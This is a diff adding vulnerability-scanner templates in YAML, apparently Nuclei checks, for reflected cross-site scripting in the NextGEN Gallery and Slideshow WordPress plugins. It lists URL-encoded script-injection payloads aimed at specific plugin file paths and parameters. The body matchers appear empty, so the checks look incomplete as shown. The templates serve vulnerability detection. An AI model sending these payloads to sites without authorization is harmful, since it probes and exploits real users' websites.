+ severity: medium + reference: https://www.securityfocus.com/bid/57200/info + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/wp-slideshow-xss.yaml b/wp-slideshow-xss.yaml new file mode 100644 index 0000000..41649c2 --- /dev/null +++ b/wp-slideshow-xss.yaml @@ -0,0 +1,32 @@ +id: wp-slideshow-xss + +info: + name: WordPress Plugin Slideshow - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.exploit-db.com/exploits/37948 + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%22%3B%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200